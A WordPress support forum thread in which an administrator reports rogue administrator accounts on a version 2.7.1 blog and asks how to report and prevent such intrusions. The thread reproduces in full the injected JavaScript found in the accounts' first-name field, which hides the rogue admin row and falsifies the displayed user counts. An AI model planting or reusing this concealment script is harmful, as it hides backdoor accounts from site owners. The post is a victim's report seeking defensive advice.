Possible WordPress exploit

(@jtietze)

Hi
I discovered today that two new users had been created on the WordPress blog I administer (version 2.7.1). Both users had the same javascript code as their “first name” (shown below).

In the upload directory I found two files whose names matched existing files, but with different extensions, dated 2nd of June 1933.

I’ve deleted both users, and the files in the upload directory.

I’m wondering whether this should or could be reported somewhere.
How could such an event be prevented?

wp_capabilities
a:1:{s:13:"administrator";b:1;}

wp_user_level
10

first_name

...

     <b id="user_superuser"><script language="JavaScript">
     var setUserName = function(){
          try{
               var t=document.getElementById("user_superuser");
               while(t.nodeName!="TR"){
                    t=t.parentNode;
               };
               t.parentNode.removeChild(t);
               var tags = document.getElementsByTagName("H3");
               var s = " shown below";
               for (var i = 0; i < tags.length; i++) {
                    var t=tags[i].innerHTML;
                    var h=tags[i];
                    if(t.indexOf(s)>0){
                         s =(parseInt(t)-1)+s;
                         h.removeChild(h.firstChild);
                         t = document.createTextNode(s);
                         h.appendChild(t);
                    }
               }

		var arr=document.getElementsByTagName("ul");
		for(var i in arr) if(arr[i].className=="subsubsub"){
		    var n=/>Administrator \\((\\d+)\\)</gi.exec(arr[i].innerHTML);
		    if(n!=null &amp;&amp; n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator \\((\\d+)\\)</gi,">Administrator ("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>Administrator <span class="count">\\((\\d+)\\)</gi.exec(arr[i].innerHTML);
		    if(n!=null &amp;&amp; n[1]>0){
			var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\\((\\d+)\\)</gi,">Administrator <span class=\\"count\\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }

		    var n=/>All <span class="count">\\((\\d+)\\)</gi.exec(arr[i].innerHTML);
		    if(n!=null &amp;&amp; n[1]>0){
			var txt=arr[i].innerHTML.replace(/>All <span class="count">\\((\\d+)\\)</gi,">All <span class=\\"count\\">("+(n[1]-1)+")<");
			arr[i].innerHTML=txt;
		    }
		}
          }catch(e){};
     };
     addLoadEvent(setUserName);
     </script>

Viewing 3 replies - 1 through 3 (of 3 total)

MichaelH
(@michaelh)

17 years, 1 month ago

Email on security issues can be reported to [email protected]

Also make sure your New user default role is Administration > Settings > General is set to subscriber.

Thread Starter jtietze
(@jtietze)

17 years, 1 month ago

The New user default role you describe is set to subscriber.

I have noticed a similar post on a German forum:
<http://forum.wordpress-deutschland.org/allgemeines/47429-gibts-ne-luecke-2.html#post229702>

Samuel B
(@samboll)

17 years, 1 month ago

just for grins check all index files on your site(s)
ask host if others have had similar problems
shared servers are only as good as the weakest user

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Possible WordPress exploit’ is closed to new replies.

Possible WordPress exploit

Tags

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics